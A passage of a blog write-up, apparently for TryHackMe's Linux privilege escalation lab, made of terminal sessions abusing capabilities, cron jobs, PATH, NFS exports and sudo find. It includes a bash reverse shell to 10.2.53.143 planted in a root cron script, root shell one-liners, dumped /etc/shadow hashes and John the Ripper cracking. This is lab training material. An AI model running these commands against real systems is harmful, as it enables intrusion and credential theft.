        <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
</pre></td><td class="rouge-code"><pre>karen@ip-10-10-184-172:~$ getcap -r / 2&gt;/dev/null
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/ping = cap_net_raw+ep
/home/karen/vim = cap_setuid+ep
/home/ubuntu/view = cap_setuid+ep

karen@ip-10-10-184-172:~$ /home/ubuntu/view -c ':py3 import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'

# bash
root@ip-10-10-184-172:~# find / -name "flag4.txt"
/home/ubuntu/flag4.txt
root@ip-10-10-184-172:~# cat /home/ubuntu/flag4.txt
THM-*******
</pre></td></tr></tbody></table></code></div></div>

<h2 id="9-privilege-escalation-cron-jobs"><span class="me-2">9 Privilege Escalation: Cron Jobs</span><a href="#9-privilege-escalation-cron-jobs" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>
<p>Cron jobs by default run with the privilege of their owners. If a scheduled task runs with root privileges and we can change the script that will be run, that script will run with root privileges. See the system-wide cron jobs <code class="language-plaintext highlighter-rouge">cat /etc/crontab</code></p>

<div class="language-plaintext highlighter-rouge"><div class="code-header">
        <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
</pre></td><td class="rouge-code"><pre>karen@ip-10-10-6-10:~$ cat /etc/crontab
...
# .---------------- minute (0 - 59)
# |  .------------- hour (0 - 23)
# |  |  .---------- day of month (1 - 31)
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# |  |  |  |  |
# *  *  *  *  * user-name command to be executed
17 *    * * *   root    cd / &amp;&amp; run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / &amp;&amp; run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / &amp;&amp; run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / &amp;&amp; run-parts --report /etc/cron.monthly )
#
* * * * *  root /antivirus.sh
* * * * *  root antivirus.sh
* * * * *  root /home/karen/backup.sh
* * * * *  root /tmp/test.py
...

karen@ip-10-10-6-10:~$ cat /home/karen/backup.sh
#!/bin/bash
cd /home/admin/1/2/3/Results
zip -r /home/admin/download.zip ./*


karen@ip-10-10-6-10:~$ find / -name "flag5.txt" 2&gt;/dev/null
/home/ubuntu/flag5.txt
karen@ip-10-10-6-10:~$ cat /home/ubuntu/flag5.txt
cat: /home/ubuntu/flag5.txt: Permission denied

karen@ip-10-10-6-10:~$ vi /home/karen/backup.sh
karen@ip-10-10-6-10:~$ cat /home/karen/backup.sh
#!/bin/bash
bash -i &gt;&amp; /dev/tcp/10.2.53.143/6666 0&gt;&amp;1
karen@ip-10-10-6-10:~$ chmod 777 /home/karen/backup.sh

──(ealder㉿host1)-[~/Downloads]
└─$ nc -nlvp 6666
listening on [any] 6666 ...
connect to [10.2.53.143] from (UNKNOWN) [10.10.6.10] 55212
bash: cannot set terminal process group (13073): Inappropriate ioctl for device
bash: no job control in this shell
root@ip-10-10-6-10:~# cat /home/ubuntu/flag5.txt
cat /home/ubuntu/flag5.txt
THM-*********

cat /etc/shadow
...
matt:$6$*****************************************************************************************:18798:0:99999:7:::

┌──(ealder㉿host1)-[~/Downloads]
└─$ vi matt

┌──(ealder㉿host1)-[~/Downloads]
└─$ cat matt
matt:$6$*****************************************************************************************:18798:0:99999:7:::

┌──(ealder㉿host1)-[~/Downloads]
└─$ john matt
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 128/128 ASIMD 2x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 2 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
******           (matt)     
1g 0:00:00:05 DONE 2/3 (2023-07-07 00:49) 0.1680g/s 1880p/s 1880c/s 1880C/s 123456..ferrises
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
</pre></td></tr></tbody></table></code></div></div>

<h2 id="10-privilege-escalation-path"><span class="me-2">10 Privilege Escalation: PATH</span><a href="#10-privilege-escalation-path" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>
<p>PATH is an environmental variable that tells the operating system where to search for executables when they are not built into the shell or defined with an absolute path.</p>

<div class="language-plaintext highlighter-rouge"><div class="code-header">
        <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
</pre></td><td class="rouge-code"><pre>karen@ip-10-10-53-18:/$ echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin


karen@ip-10-10-53-18:/$ find / -writable 2&gt;/dev/null | cut -d "/" -f 2,3 | grep -v proc | sort -u
...
home/*******
...
tmp
...

karen@ip-10-10-53-18:/$ find / -name "flag6.txt" 2&gt;/dev/null
/home/matt/flag6.txt


karen@ip-10-10-53-18:/$ cat /home/matt/flag6.txt
cat: /home/matt/flag6.txt: Permission denied

karen@ip-10-10-53-18:/tmp$ ls -l /home//*******/
total 24
-rwsr-xr-x 1 root root 16712 Jun 20  2021 test
-rw-rw-r-- 1 root root    86 Jun 20  2021 thm.py

karen@ip-10-10-53-18:/tmp$ cat /home/murdoch/thm.py
/usr/bin/python3

import os
import sys

try:
        os.system("thm")
except:
        sys.exit()

karen@ip-10-10-53-18:/$ echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
export PATH=/tmp:$PATH
karen@ip-10-10-53-18:/tmp$ echo $PATH
/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin

karen@ip-10-10-53-18:/tmp$ vi /tmp/thm
karen@ip-10-10-53-18:/tmp$ cat /tmp/thm
cat /home/matt/flag6.txt
karen@ip-10-10-53-18:/tmp$
karen@ip-10-10-53-18:/tmp$
karen@ip-10-10-53-18:/tmp$ /home/murdoch/test
THM-736628929
</pre></td></tr></tbody></table></code></div></div>

<h2 id="11-privilege-escalation-nfs"><span class="me-2">11 Privilege Escalation: NFS</span><a href="#11-privilege-escalation-nfs" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>
<p>NFS configuration can be found in /etc/exports. If an NFS share is configured with “no_root_squash”, NFS will not change the root user to “nfsnobody” and will not strip files from operating with root privileges. An attacker could create an executable with SUID bit set and run it on the target system.</p>

<div class="language-plaintext highlighter-rouge"><div class="code-header">
        <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
</pre></td><td class="rouge-code"><pre>karen@ip-10-10-39-217:/$ cat /etc/exports
/home/backup *(rw,sync,insecure,no_root_squash,no_subtree_check)
/tmp *(rw,sync,insecure,no_root_squash,no_subtree_check)
/home/ubuntu/sharedfolder *(rw,sync,insecure,no_root_squash,no_subtree_check)

root@ip-10-10-181-118:~# showmount -e 10.10.39.217
Export list for 10.10.39.217:
/home/ubuntu/sharedfolder *
/tmp                      *
/home/backup              *

root@ip-10-10-181-118:/tmp/backupsonattackermachine# mkdir /tmp/tmponattackermachine
root@ip-10-10-181-118:/tmp/backupsonattackermachine# mount -o rw 10.10.39.217:/tmp/ /tmp/tmponattackermachine/
root@ip-10-10-181-118:/tmp/backupsonattackermachine# cd /tmp/tmponattackermachine/

karen@ip-10-10-39-217:/tmp$ ./nfs
root@ip-10-10-39-217:/tmp# id
uid=0(root) gid=0(root) groups=0(root),1001(karen)
root@ip-10-10-39-217:/tmp# whoami
root

root@ip-10-10-39-217:/tmp# find / -name "flag7.txt"
/home/matt/flag7.txt
root@ip-10-10-39-217:/tmp# cat /home/matt/flag7.txt
THM-********

</pre></td></tr></tbody></table></code></div></div>

<h2 id="12-privilege-escalation-capstone-challenge"><span class="me-2">12 Privilege Escalation: Capstone Challenge</span><a href="#12-privilege-escalation-capstone-challenge" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<div class="language-plaintext highlighter-rouge"><div class="code-header">
        <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
</pre></td><td class="rouge-code"><pre>[leonard@ip-10-10-167-52 ~]$ uname -a
Linux ip-10-10-167-52 3.10.0-1160.el7.x86_64 #1 SMP Mon Oct 19 16:18:59 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux

[leonard@ip-10-10-167-52 ~]$ cat /proc/version
Linux version 3.10.0-1160.el7.x86_64 (mockbuild@kbuilder.bsys.centos.org) (gcc version 4.8.5 20150623 (Red Hat 4.8.5-44) (GCC) ) #1 SMP Mon Oct 19 16:18:59 UTC 2020

[leonard@ip-10-10-167-52 ~]$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
missy:x:1001:1001::/home/missy:/bin/bash

[leonard@ip-10-10-167-52 ~]$ base64 /etc/shadow | base64 --decode
root:$6$DWBzMoiprTTJ4gbW$g0szmtfn3HYFQweUPpSUCgHXZLzVii5o6PM0Q2oMmaDD9oGUSxe1yvKbnYsaSYHrUEQXTjIwOW/yrzV5HtIL51::0:99999:7:::
missy:$6$BjOlWE21$HwuDvV1iSiySCNpA3Z9LxkxQEqUAdZvObTxJxMoCp/9zRVCi6/zrlMlAQPAxfwaD2JCUypk4HaNzI3rPVqKHb/:18785:0:99999:7:::

──(ealder㉿host1)-[~/Downloads/12]
└─$ vi password  

┌──(ealder㉿host1)-[~/Downloads/12]
└─$ cat password  
root:x:0:0:root:/root:/bin/bash
missy:x:1001:1001::/home/missy:/bin/bash

┌──(ealder㉿host1)-[~/Downloads/12]
└─$ vi shadow  

┌──(ealder㉿host1)-[~/Downloads/12]
└─$ cat shadow  
root:$6$DWBzMoiprTTJ4gbW$g0szmtfn3HYFQweUPpSUCgHXZLzVii5o6PM0Q2oMmaDD9oGUSxe1yvKbnYsaSYHrUEQXTjIwOW/yrzV5HtIL51::0:99999:7:::
missy:$6$BjOlWE21$HwuDvV1iSiySCNpA3Z9LxkxQEqUAdZvObTxJxMoCp/9zRVCi6/zrlMlAQPAxfwaD2JCUypk4HaNzI3rPVqKHb/:18785:0:99999:7:::

┌──(ealder㉿host1)-[~/Downloads/12]
└─$ unshadow password shadow &gt; unshadowed

┌──(ealder㉿host1)-[~/Downloads/12]
└─$ cat unshadowed
root:$6$DWBzMoiprTTJ4gbW$g0szmtfn3HYFQweUPpSUCgHXZLzVii5o6PM0Q2oMmaDD9oGUSxe1yvKbnYsaSYHrUEQXTjIwOW/yrzV5HtIL51:0:0:root:/root:/bin/bash
missy:$6$BjOlWE21$HwuDvV1iSiySCNpA3Z9LxkxQEqUAdZvObTxJxMoCp/9zRVCi6/zrlMlAQPAxfwaD2JCUypk4HaNzI3rPVqKHb/:1001:1001::/home/missy:/bin/bash

┌──(ealder㉿host1)-[~/Downloads/12]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt unshadowed
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (sha512crypt, crypt(3) $6$ [SHA512 128/128 ASIMD 2x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
*********        (missy)


[missy@ip-10-10-167-52 ~]$ cat /home/missy/Documents/flag1.txt
THM-**************


[missy@ip-10-10-167-52 ~]$ sudo -l
Matching Defaults entries for missy on ip-10-10-167-52:
    !visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin,
    env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS",
    env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE",
    env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES",
    env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME
    LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
    secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

User missy may run the following commands on ip-10-10-167-52:
    (ALL) NOPASSWD: /usr/bin/find


[missy@ip-10-10-167-52 ~]$ sudo find /home -exec /bin/bash \;
[root@ip-10-10-167-52 missy]# whoami
root

[root@ip-10-10-167-52 missy]# ls -l /home/rootflag/
total 4
-rw-r--r--. 1 root root 20 Jun  7  2021 flag2.txt
[root@ip-10-10-167-52 missy]# cat /home/rootflag/flag2.txt
THM-***************

</pre></td></tr></tbody></table></code></div></div>

<!--
## Troubleshooting

"Permission denied" while trying to transfer a file. The current user did not have write permissions in the working directory. Use `find` to locate a writable directory.
```
karen@wade7363:/$ wget 10.2.53.143:8000/ofs
--2023-07-05 20:07:49--  http://10.2.53.143:8000/ofs
Connecting to 10.2.53.143:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 71424 (70K) [application/octet-stream]
ofs: Permission denied

Cannot write to ‘ofs’ (Permission denied).


karen@wade7363:/$ find / -writable -type d 2>/dev/null
...
/tmp
...

karen@wade7363:/$ cd tmp/
karen@wade7363:/tmp$ wget 10.2.53.143:8000/ofs
--2023-07-05 20:12:06--  http://10.2.53.143:8000/ofs
Connecting to 10.2.53.143:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 71424 (70K) [application/octet-stream]
Saving to: ‘ofs’

100%[=========================================================================>] 71,424       235KB/s   in 0.3s   

2023-07-05 20:12:07 (235 KB/s) - ‘ofs’ saved [71424/71424]
```

"Permission denied" while trying to execute a binary. Make it executable.
```
karen@wade7363:/tmp$ ./ofs
bash: ./ofs: Permission denied
karen@wade7363:/tmp$ chmod +x ./ofs
```

"Format error" while trying to execute a binary. This was because it was compiled targeting the wrong architecture. Recompile it for the correct architecture.
```
karen@wade7363:/tmp$ ./ofs
bash: ./ofs: cannot execute binary file: Exec format error
```
-->

  </div>

  <div class="post-tail-wrapper text-muted">
    <!-- categories -->
    

    <div
      class="
        post-tail-bottom
        d-flex justify-content-between align-items-center mt-5 pb-2
      "
    >
      <!--<div class="license-wrapper">
        
          

          This post is licensed under 
        <a href="https://creativecommons.org/licenses/by/4.0/">
          CC BY 4.0
        </a>
         by the author.
        
      </div>-->


    </div>
    <!-- .post-tail-bottom -->
  </div>
  <!-- div.post-tail-wrapper -->
</article>


            
          </main>

          <!-- panel -->
          <aside aria-label="Panel" id="panel-wrapper" class="col-xl-3 ps-2 mb-5 text-muted">
            <div class="access">
              <!-- Get 5 last posted/updated posts -->














  <section id="access-lastmod">
    <h2 class="panel-heading">Recently Updated</h2>
    <ul class="content list-unstyled ps-0 pb-1 ms-1 mt-2">
      
        
        
        
        <li class="text-truncate lh-lg">
          <a href="/posts/tryhackme-windows-privilege-escalation/">TryHackMe: Windows Privilege Escalation</a>
        </li>
      
        
        
        
        <li class="text-truncate lh-lg">
          <a href="/posts/tryhackme-linux-privilege-escalation/">TryHackMe: Linux Privilege Escalation</a>
        </li>
      
    </ul>
  </section>
  <!-- #access-lastmod -->


              <!-- The trending tags list -->















  
    
    
    
    
      
        
        



  <section>
    <h2 class="panel-heading">Tags</h2>
    <div class="d-flex flex-wrap mt-3 mb-1 me-3">
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/write-up/">write-up</a>
      
    </div>
  </section>


            </div>

            
              
              



  <section id="toc-wrapper" class="ps-0 pe-4">
    <h2 class="panel-heading ps-3 pt-2 mb-2">Contents</h2>
    <nav id="toc"></nav>
  </section>


            
          </aside>
        </div>

        <div class="row">
          <!-- tail -->
          <div id="tail-wrapper" class="col-12 col-lg-11 col-xl-9 px-md-4">
            
              
              <!--  The comments switcher -->


            

            <!-- The Footer -->

<footer
  aria-label="Site Info"
  class="
    d-flex flex-column justify-content-center text-muted
    flex-lg-row justify-content-lg-between align-items-lg-center pb-lg-3
  "
>
  <p>
    ©
    <time>2024</time>
    <a href="">Joe Miller</a>.
    
      <span
        data-bs-toggle="tooltip"
        data-bs-placement="top"
        title="Except where otherwise noted, the blog posts on this site are licensed under the Creative Commons Attribution 4.0 International (CC BY 4.0) License by the author."
      >Some rights reserved.</span>
    
  </p>

  <p>Using the <a href="https://github.com/cotes2020/jekyll-theme-chirpy" target="_blank" rel="noopener">Chirpy</a> theme for <a href="https://jekyllrb.com" target="_blank" rel="noopener">Jekyll</a>.
  </p>
</footer>

          </div>
        </div>

        <!-- The Search results -->

<div id="search-result-wrapper" class="d-flex justify-content-center unloaded">
  <div class="col-11 content">
    <div id="search-hints">
      <!-- The trending tags list -->















  
    
    
    
    
      
        
        



  <section>
    <h2 class="panel-heading">Tags</h2>
    <div class="d-flex flex-wrap mt-3 mb-1 me-3">
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/write-up/">write-up</a>
      
    </div>
  </section>


    </div>
    <div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div>
  </div>
</div>

      </div>

      <aside aria-label="Scroll to Top">
        <button id="back-to-top" type="button" class="btn btn-lg btn-box-shadow">
          <i class="fas fa-angle-up"></i>
        </button>
      </aside>
    </div>

    <div id="mask"></div>

    
      <aside
  id="notification"
  class="toast"
  role="alert"
  aria-live="assertive"
  aria-atomic="true"
  data-bs-animation="true"
  data-bs-autohide="false"
>
  <div class="toast-header">
    <button
      type="button"
      class="btn-close ms-auto"
      data-bs-dismiss="toast"
      aria-label="Close"
    ></button>
  </div>
  <div class="toast-body text-center pt-0">
    <p class="px-2 mb-3">A new version of content is available.</p>
    <button type="button" class="btn btn-primary" aria-label="Update">
      Update
    </button>
  </div>
</aside>

    

    <!-- JavaScripts -->

    <!-- JS selector for site. -->

<!-- commons -->



<!-- layout specified -->


  

  
    <!-- image lazy-loading & popup & clipboard -->
    
  















  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  



  <script src="https://cdn.jsdelivr.net/combine/npm/jquery@3.7.1/dist/jquery.min.js,npm/bootstrap@5.3.2/dist/js/bootstrap.bundle.min.js,npm/simple-jekyll-search@1.10.0/dest/simple-jekyll-search.min.js,npm/loading-attribute-polyfill@2.1.1/dist/loading-attribute-polyfill.umd.min.js,npm/magnific-popup@1.1.0/dist/jquery.magnific-popup.min.js,npm/clipboard@2.0.11/dist/clipboard.min.js,npm/dayjs@1.11.10/dayjs.min.js,npm/dayjs@1.11.10/locale/en.min.js,npm/dayjs@1.11.10/plugin/relativeTime.min.js,npm/dayjs@1.11.10/plugin/localizedFormat.min.js,npm/tocbot@4.25.0/dist/tocbot.min.js"></script>






<script defer src="/assets/js/dist/post.min.js"></script>






    

    <!--
  Jekyll Simple Search loader
  See: <https://github.com/christian-fei/Simple-Jekyll-Search>
-->





<script>
  /* Note: dependent library will be loaded in `js-selector.html` */
  SimpleJekyllSearch({
    searchInput: document.getElementById('search-input'),
    resultsContainer: document.getElementById('search-results'),
    json: '/assets/js/data/search.json',
    searchResultTemplate: '  <article class="px-1 px-sm-2 px-lg-4 px-xl-0">    <header>      <h2><a href="{url}">{title}</a></h2>      <div class="post-meta d-flex flex-column flex-sm-row text-muted mt-1 mb-1">        {categories}        {tags}      </div>    </header>    <p>{snippet}</p>  </article>',
    noResultsText: '<p class="mt-5"></p>',
    templateMiddleware: function(prop, value, template) {
      if (prop === 'categories') {
        if (value === '') {
          return `${value}`;
        } else {
          return `<div class="me-sm-4"><i class="far fa-folder fa-fw"></i>${value}</div>`;
        }
      }

      if (prop === 'tags') {
        if (value === '') {
          return `${value}`;
        } else {
          return `<div><i class="fa fa-tag fa-fw"></i>${value}</div>`;
        }
      }
    }
  });
</script>

  </body>
</html>

